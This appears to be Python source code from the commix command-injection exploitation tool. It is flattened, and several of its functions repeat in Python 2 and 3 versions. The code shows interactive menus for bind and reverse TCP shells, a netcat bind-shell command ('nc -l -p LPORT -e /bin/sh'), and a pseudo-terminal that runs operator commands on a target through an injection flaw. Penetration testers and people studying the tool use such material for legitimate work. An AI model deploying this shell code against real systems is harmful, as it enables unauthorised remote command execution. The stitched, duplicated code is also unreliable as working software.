def bind_tcp_options():
while True:
bind_tcp_option = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Bind TCP shells""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use a netcat bind TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' for other bind TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """bind_tcp""" + Style.RESET_ALL +
""") > """)
# Option 1 - Netcat shell
if bind_tcp_option == '1':
bind_tcp_option = netcat_version()
if bind_tcp_option.lower() not in settings.SHELL_OPTIONS:
shell_success()
break
elif bind_tcp_option.lower() in settings.SHELL_OPTIONS:
return bind_tcp_option
else:
pass
# Option 2 - Other (Netcat-Without-Netcat) shells
elif bind_tcp_option == '2':
bind_tcp_option = other_bind_shells()
if bind_tcp_option.lower() not in settings.SHELL_OPTIONS:
shell_success()
break
elif bind_tcp_option.lower() in settings.SHELL_OPTIONS:
return bind_tcp_option
else:
pass
elif bind_tcp_option.lower() == "bind_tcp":
warn_msg = "You are already into the '" + bind_tcp_option.lower(
) + "' mode."
print settings.print_warning_msg(warn_msg)
continue
elif bind_tcp_option.lower() == "?":
menu.os_shell_options()
continue
elif bind_tcp_option.lower() == "quit":
sys.exit(0)
elif bind_tcp_option.lower() in settings.SHELL_OPTIONS:
return bind_tcp_option
elif bind_tcp_option[0:3].lower() == "set":
if bind_tcp_option[4:9].lower() == "rhost":
check_rhost(bind_tcp_option[10:])
if bind_tcp_option[4:9].lower() == "lport":
check_lport(bind_tcp_option[10:])
else:
err_msg = "The '" + bind_tcp_option + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
return bind_tcp_option
def check_os_shell_options(cmd, technique, go_back, no_result):
if cmd in settings.SHELL_OPTIONS:
if cmd == "?":
menu.os_shell_options()
elif cmd == "back":
if next_attack_vector(technique, go_back) == True:
return True
else:
return False
else:
return cmd
def netcat_version():
# Netcat alternatives
NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"]
while True:
nc_version = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like targets""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use the default Netcat on target host.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' to use Netcat for Busybox on target host.
Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL +
"""' to use Netcat-Traditional on target host.
commix(""" + Style.BRIGHT + Fore.RED + """bind_tcp_netcat""" +
Style.RESET_ALL + """) > """)
# Default Netcat
if nc_version == '1':
nc_alternative = NETCAT_ALTERNATIVES[0]
break
# Netcat for Busybox
if nc_version == '2':
nc_alternative = NETCAT_ALTERNATIVES[1]
break
# Netcat-Traditional
elif nc_version == '3':
nc_alternative = NETCAT_ALTERNATIVES[2]
break
elif nc_version.lower() == "bind_tcp":
warn_msg = "You are already into the '" + nc_version.lower(
) + "' mode."
print settings.print_warning_msg(warn_msg)
continue
elif nc_version.lower() == "?":
menu.os_shell_options()
continue
elif nc_version.lower() in settings.SHELL_OPTIONS:
return nc_version
elif nc_version[0:3].lower() == "set":
if nc_version[4:9].lower() == "rhost":
check_rhost(nc_version[10:])
if nc_version[4:9].lower() == "lport":
check_lport(nc_version[10:])
else:
err_msg = "The '" + nc_version + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
cmd = nc_alternative + " -l -p " + settings.LPORT + " -e /bin/sh"
return cmd
def check_os_shell_options(cmd, technique, go_back, no_result):
if cmd in settings.SHELL_OPTIONS:
if cmd == "?":
menu.os_shell_options()
elif cmd == "back":
if next_attack_vector(technique, go_back) == True:
return True
else:
return False
else:
return cmd
def reverse_tcp_options():
while True:
reverse_tcp_option = raw_input("""
---[ """ + Style.BRIGHT + Fore.BLUE + """Reverse TCP shells""" +
Style.RESET_ALL + """ ]---
Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL +
"""' to use a netcat reverse TCP shell.
Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL +
"""' for other reverse TCP shells.
commix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp""" + Style.RESET_ALL +
""") > """)
# Option 1 - Netcat shell
if reverse_tcp_option == '1':
reverse_tcp_option = netcat_version()
if reverse_tcp_option.lower() not in settings.SHELL_OPTIONS:
shell_success()
break
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
else:
pass
# Option 2 - Other (Netcat-Without-Netcat) shells
elif reverse_tcp_option == '2':
reverse_tcp_option = other_reverse_shells()
if reverse_tcp_option.lower() not in settings.SHELL_OPTIONS:
shell_success()
break
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
else:
pass
elif reverse_tcp_option.lower() == "?":
menu.os_shell_options()
continue
elif reverse_tcp_option.lower() == "quit":
sys.exit(0)
elif reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
return reverse_tcp_option
elif reverse_tcp_option[0:3].lower() == "set":
if reverse_tcp_option[4:9].lower() == "lhost":
check_lhost(reverse_tcp_option[10:])
if reverse_tcp_option[4:9].lower() == "lport":
check_lport(reverse_tcp_option[10:])
else:
err_msg = "The '" + reverse_tcp_option + "' option, is not valid."
print settings.print_error_msg(err_msg)
continue
return reverse_tcp_option
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
warn_msg = "The " + err_msg + " options are not supported "
warn_msg += "by this module because of the structure of the exfiltrated data. "
warn_msg += "Please try using any unix-like commands manually."
print(settings.print_warning_msg(warn_msg))
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
# sys.stdout.write(settings.print_question_msg(question_msg))
# gotshell = sys.stdin.readline().replace("\n","").lower()
gotshell = _input(settings.print_question_msg(question_msg))
else:
gotshell = ""
if len(gotshell) == 0:
gotshell = "y"
if gotshell in settings.CHOICE_YES:
print("\nPseudo-Terminal (type '" + Style.BRIGHT + "?" +
Style.RESET_ALL + "' for available options)")
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__',
'') is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED +
"""os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print("")
os._exit(0)
elif cmd.lower() == "?":
menu.os_shell_options()
elif cmd.lower() == "os_shell":
warn_msg = "You are already into the '" + cmd.lower(
) + "' mode."
print(settings.print_warning_msg(warn_msg)) + "\n"
elif cmd.lower() == "reverse_tcp":
warn_msg = "This option is not supported by this module."
print(settings.print_warning_msg(warn_msg)) + "\n"
else:
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd, url,
vuln_parameter)
except KeyboardInterrupt:
print("")
os._exit(0)
except:
print("")
os._exit(0)
elif gotshell in settings.CHOICE_NO:
print("")
os._exit(0)
elif gotshell in settings.CHOICE_QUIT:
print("")
os._exit(0)
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
warn_msg = "The " + err_msg + " options are not supported "
warn_msg += "by this module because of the structure of the exfiltrated data. "
warn_msg += "Please try using any unix-like commands manually."
print(settings.print_warning_msg(warn_msg))
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
gotshell = _input(settings.print_question_msg(question_msg))
else:
gotshell = ""
if len(gotshell) == 0:
gotshell= "Y"
if gotshell in settings.CHOICE_YES:
print("\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
if settings.READLINE_ERROR:
checks.no_readline_module()
while True:
try:
if not settings.READLINE_ERROR:
checks.tab_autocompleter()
cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print(settings.SPACE)
os._exit(0)
elif cmd.lower() == "?":
menu.os_shell_options()
elif cmd.lower() == "os_shell":
warn_msg = "You are already into the '" + cmd.lower() + "' mode."
print(settings.print_warning_msg(warn_msg))+ "\n"
elif cmd.lower() == "reverse_tcp":
warn_msg = "This option is not supported by this module."
print(settings.print_warning_msg(warn_msg))+ "\n"
else:
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)
except KeyboardInterrupt:
print(settings.SPACE)
os._exit(0)
except:
print(settings.SPACE)
os._exit(0)
elif gotshell in settings.CHOICE_NO:
print(settings.SPACE)
os._exit(0)
elif gotshell in settings.CHOICE_QUIT:
print(settings.SPACE)
os._exit(0)
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print(settings.print_error_msg(err_msg))
pass
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
err_msg = ""
if menu.enumeration_options():
err_msg += "enumeration"
if menu.file_access_options():
if err_msg != "":
err_msg = err_msg + " and "
err_msg = err_msg + "file-access"
if err_msg != "":
warn_msg = "The " + err_msg + " options are not supported "
warn_msg += "by this module because of the structure of the exfiltrated data. "
warn_msg += "Please try using any unix-like commands manually."
print settings.print_warning_msg(warn_msg)
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if not menu.options.batch:
question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
sys.stdout.write(settings.print_question_msg(question_msg))
gotshell = sys.stdin.readline().replace("\n","").lower()
else:
gotshell = ""
if len(gotshell) == 0:
gotshell= "y"
if gotshell in settings.CHOICE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.os_shell_options()
elif cmd.lower() == "os_shell":
warn_msg = "You are already into the '" + cmd.lower() + "' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif cmd.lower() == "reverse_tcp":
warn_msg = "This option is not supported by this module."
print settings.print_warning_msg(warn_msg)+ "\n"
else:
# Command execution results.
cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOICE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOICE_QUIT:
print ""
os._exit(0)
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
pass